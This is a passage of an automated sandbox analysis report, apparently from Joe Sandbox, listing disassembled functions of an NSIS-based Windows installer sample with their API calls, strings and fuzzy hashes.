                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                          • API String ID: 1451636040-1158693248
                                                          • Opcode ID: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
                                                          • Instruction ID: 6313022a6a14420ec29aadc91542e870ad3eb66361cb8d6516b6428425dce57e
                                                          • Opcode Fuzzy Hash: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
                                                          • Instruction Fuzzy Hash: 36F01270504108ABEF205F50DD4ABAE3768BB00309F00843AFA16B51D1DBB95959DB59
                                                          Function 004049D6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A67
                                                          • wsprintfW.USER32 ref: 00404A70
                                                          • SetDlgItemTextW.USER32(?,004226E8), ref: 00404A83
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: ItemTextlstrlenwsprintf
                                                          • String ID: %u.%u%s%s$&B
                                                          • API String ID: 3540041739-2907463167
                                                          • Opcode ID: 8753f46c6ec8b6f380e8412305eac44d84582c9e4d7b05b47d8315f57e295f46
                                                          • Instruction ID: b2bc00afb158c588b9a06456614f3f49c694bd1d1c2ad39e9d347cd1a0135542
                                                          • Opcode Fuzzy Hash: 8753f46c6ec8b6f380e8412305eac44d84582c9e4d7b05b47d8315f57e295f46
                                                          • Instruction Fuzzy Hash: 131126737001247BCB10A66D9C45EDF324DDBC5334F144237FA65F60D1D938882186E8
                                                          Function 004061DC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,75573420,00403542), ref: 0040623F
                                                          • CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                          • CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,75573420,00403542), ref: 00406253
                                                          • CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,75573420,00403542), ref: 00406266
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: *?|<>/":
                                                          • API String ID: 589700163-165019052
                                                          • Opcode ID: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
                                                          • Instruction ID: 5b12d47152ff200ae170f947aa1a5954375b24b0904b9d00ef93706c4e891e75
                                                          • Opcode Fuzzy Hash: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
                                                          • Instruction Fuzzy Hash: 1311E61580020295DB303B548C44AB772F8EF95750F42807FED9A732C1E77C5CA286BD
                                                          Function 004024EE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54filestringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WideCharToMultiByte.KERNEL32(?,?,0040A598,000000FF,00409D98,?,?,?,00000021), ref: 0040252F
                                                          • lstrlenA.KERNEL32(00409D98,?,?,0040A598,000000FF,00409D98,?,?,?,00000021), ref: 00402536
                                                          • WriteFile.KERNEL32(00000000,?,00409D98,00000000,?,?,00000000,00000011), ref: 00402568
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: ByteCharFileMultiWideWritelstrlen
                                                          • String ID: 8
                                                          • API String ID: 1453599865-4194326291
                                                          • Opcode ID: ea1fd01545954b45b1115061ad650ac053f3389e3020f7797eada7c30f8acbb3
                                                          • Instruction ID: a0446c0b0672562d506aa58c1ab7e20caafec20b23fb80a76c6cc5bad6f3e06b
                                                          • Opcode Fuzzy Hash: ea1fd01545954b45b1115061ad650ac053f3389e3020f7797eada7c30f8acbb3
                                                          • Instruction Fuzzy Hash: C0015271A44214FFD700AFB09E8AEAB7278AF51719F20453BB102B61D1D6BC5E419A2D
                                                          Function 00401752 Relevance: 7.6, APIs: 5, Instructions: 145stringtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrcatW.KERNEL32(00000000,00000000,00409598,00435000,?,?,00000031), ref: 00401793
                                                          • CompareFileTime.KERNEL32(-00000014,?,00409598,00409598,00000000,00000000,00409598,00435000,?,?,00000031), ref: 004017B8
                                                            • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,?,004033C8,00428200,NSIS Error), ref: 00405F55
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                            • Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                            • Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                          • String ID:
                                                          • API String ID: 1941528284-0
                                                          • Opcode ID: c6112705f82b7b1622065ee3eab6168811afede877eaf12318c42c814ff79ec4
                                                          • Instruction ID: 22a22a0f5d261001ccd7191b61e6a6ae22ba545f5f0eb33ed6189b5534195358
                                                          • Opcode Fuzzy Hash: c6112705f82b7b1622065ee3eab6168811afede877eaf12318c42c814ff79ec4
                                                          • Instruction Fuzzy Hash: 3341C071900515BACF11BBB5CC86EAF3679EF06369F20423BF422B10E1C73C8A419A6D
                                                          Function 00402B7A Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B9B
                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Close$DeleteEnumOpen
                                                          • String ID:
                                                          • API String ID: 1912718029-0
                                                          • Opcode ID: 7fa7a74cbbe584c41cdd651777289953afc00df8a6fd94206c47d0172b2a88ac
                                                          • Instruction ID: 39c85bfe7ca74ada2351cc0a51ccebcd1f3e21716521df4e7e96f28c7df0de5f
                                                          • Opcode Fuzzy Hash: 7fa7a74cbbe584c41cdd651777289953afc00df8a6fd94206c47d0172b2a88ac
                                                          • Instruction Fuzzy Hash: 5B116A31904008FEEF229F90DE89EAE3B7DFB14348F100476FA01B00A0D3B59E51EA69
                                                          Function 00401CE5 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                          • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                          • DeleteObject.GDI32(00000000), ref: 00401D36
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          • Opcode ID: 4425ef670e00afe2a656f4b56edeb2e82870f2bba3a859581bccad4f1df822b2
                                                          • Instruction ID: 421c968aeac85d0930bc76aa4bc7d64c85250730bd7c855cb2b2db6532b3540a
                                                          • Opcode Fuzzy Hash: 4425ef670e00afe2a656f4b56edeb2e82870f2bba3a859581bccad4f1df822b2
                                                          • Instruction Fuzzy Hash: F9F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                          Function 00401D41 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDC.USER32(?), ref: 00401D44
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                          • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                          • CreateFontIndirectW.GDI32(0040BDA0), ref: 00401DBC
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                          • String ID:
                                                          • API String ID: 3808545654-0
                                                          • Opcode ID: e505f65a548bf0974f6aee529334db0e8f2b0f649825e5e5403c9d7ad871e098
                                                          • Instruction ID: b353f613be9e85a79a94993a8857fa9d5f5277bee054f22ce4286571968d2ed5
                                                          • Opcode Fuzzy Hash: e505f65a548bf0974f6aee529334db0e8f2b0f649825e5e5403c9d7ad871e098
                                                          • Instruction Fuzzy Hash: 4A016D31948285EFEB416BB0AE0AFDABF74EB65305F144479F141B62E2C77810058B6E
                                                          Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Timeout
                                                          • String ID: !
                                                          • API String ID: 1777923405-2657877971
                                                          • Opcode ID: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                          • Instruction ID: bea79b3a0ece1bc6ad67d762bc59202c8df9b0d3ac543b92a9f7cfbf89d94624
                                                          • Opcode Fuzzy Hash: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                          • Instruction Fuzzy Hash: 6B217471A44109BEDF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                          Function 0040317D Relevance: 6.1, APIs: 4, Instructions: 108fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00403192
                                                            • Part of subcall function 0040330F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                          • SetFilePointer.KERNEL32(00000000,00000000,?,00000000,?,00403095,?,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                          • WriteFile.KERNEL32(0040BE90,?,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,?,00000000,00000000,?,?), ref: 0040327F
                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,?,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: File$Pointer$CountTickWrite
                                                          • String ID:
                                                          • API String ID: 2146148272-0
                                                          • Opcode ID: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
                                                          • Instruction ID: 34320a24581f7621071559271f75aff2a33e70c32c739a51ea230fcf3b1a2f41
                                                          • Opcode Fuzzy Hash: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
                                                          • Instruction Fuzzy Hash: CB418B72504205DFDB109F29EE84AA63BADF74431671441BFE604B22E1C7B96D418BEC
                                                          Function 00402331 Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                          • lstrlenW.KERNEL32(0040A598,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                          • RegSetValueExW.ADVAPI32(?,?,?,?,0040A598,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                          • RegCloseKey.ADVAPI32(?,?,?,0040A598,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateValuelstrlen
                                                          • String ID:
                                                          • API String ID: 1356686001-0
                                                          • Opcode ID: ba6de99ecd9c974ff92ad763852c2a36614bc53b67291303901efbf9c54001f3
                                                          • Instruction ID: 1c964708cf89b7fac74d07524040b6b2ab84de1cfba919da144199f52892a02b
                                                          • Opcode Fuzzy Hash: ba6de99ecd9c974ff92ad763852c2a36614bc53b67291303901efbf9c54001f3
                                                          • Instruction Fuzzy Hash: A51190B1A00108BEEB11EFA4CD89EAFBB7CEB50358F10443AF505B61D1D7B85E409B29
                                                          Function 004015B9 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00405A3E: CharNextW.USER32(?,?,00424EF0,?,00405AB2,00424EF0,00424EF0,00436800,?,75572EE0,004057F0,?,00436800,75572EE0,00434000), ref: 00405A4C
                                                            • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A51
                                                            • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A69
                                                          • CreateDirectoryW.KERNEL32(?,?,00000000,?,00000000,?), ref: 004015E3
                                                          • GetLastError.KERNEL32(?,00000000,?,00000000,?), ref: 004015ED
                                                          • GetFileAttributesW.KERNEL32(?,?,00000000,?,00000000,?), ref: 004015FD
                                                          • SetCurrentDirectoryW.KERNEL32(?,00435000,?,00000000,?), ref: 00401630
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                          • String ID:
                                                          • API String ID: 3751793516-0
                                                          • Opcode ID: 7fc8d92597ca224d1c9d0f403f8dd560b19a4790d4067b824d9ac869d91d7f68
                                                          • Instruction ID: 602e027c19ef8137931421d3e2870900c2c1aa36f58208ee64056e3add0ea48c
                                                          • Opcode Fuzzy Hash: 7fc8d92597ca224d1c9d0f403f8dd560b19a4790d4067b824d9ac869d91d7f68
                                                          • Instruction Fuzzy Hash: 4F11C271904200EBCF206FA0CD449AE7AB4FF14369B34463BF881B62E1D23D49419A6E
                                                          Function 00401F08 Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                          • GlobalAlloc.KERNEL32(?,00000000,00000000,?,000000EE), ref: 00401F39
                                                          • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                          • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                            • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                          • String ID:
                                                          • API String ID: 1404258612-0
                                                          • Opcode ID: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
                                                          • Instruction ID: 99fd8a33424c76a20816063d32e2a6550cff77f564c1afe2c3b0238effae22d3
                                                          • Opcode Fuzzy Hash: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
                                                          • Instruction Fuzzy Hash: 93113675A00108AECB00DFA5C945DAEBBBAEF44344F20407AF905F62E1D7349E50DB68
                                                          Function 00401E51 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                            • Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                            • Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                            • Part of subcall function 004056C3: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                            • Part of subcall function 004056C3: CloseHandle.KERNEL32(?), ref: 004056F5
                                                          • WaitForSingleObject.KERNEL32(00000000,?,00000000,000000EB,00000000), ref: 00401E80
                                                          • WaitForSingleObject.KERNEL32(?,?,0000000F), ref: 00401E95
                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 3585118688-0
                                                          • Opcode ID: 35074abae760ef12712c5987b0758c23aa86cdd0156e8bbbcf6b223dd8d47178
                                                          • Instruction ID: 663650117de36b32c607de2b5c5339e49b80fcfff4c178b035665d2e4b1c7066
                                                          • Opcode Fuzzy Hash: 35074abae760ef12712c5987b0758c23aa86cdd0156e8bbbcf6b223dd8d47178
                                                          • Instruction Fuzzy Hash: 8811A131E00204EBCF109FA0CD449EF7AB5EB44315F20447BE505B62E0C7798A82DBA9
                                                          Function 00405166 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 00405195
                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 004051E6
                                                            • Part of subcall function 004041E6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Window$CallMessageProcSendVisible
                                                          • String ID:
                                                          • API String ID: 3748168415-3916222277
                                                          • Opcode ID: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
                                                          • Instruction ID: 7fff49106f067b4291516d9fc604604598bdb5380bd5c908914395e8565309e0
                                                          • Opcode Fuzzy Hash: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
                                                          • Instruction Fuzzy Hash: 26015E71900609BBDB205F51ED84B6B3A26E794364F604037FA007A2D1D77A9C919F69
                                                          Function 00405BE3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00405C01
                                                          • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403358,00436000,00436800), ref: 00405C1C
                                                          Strings
                                                          Memory Dump Source
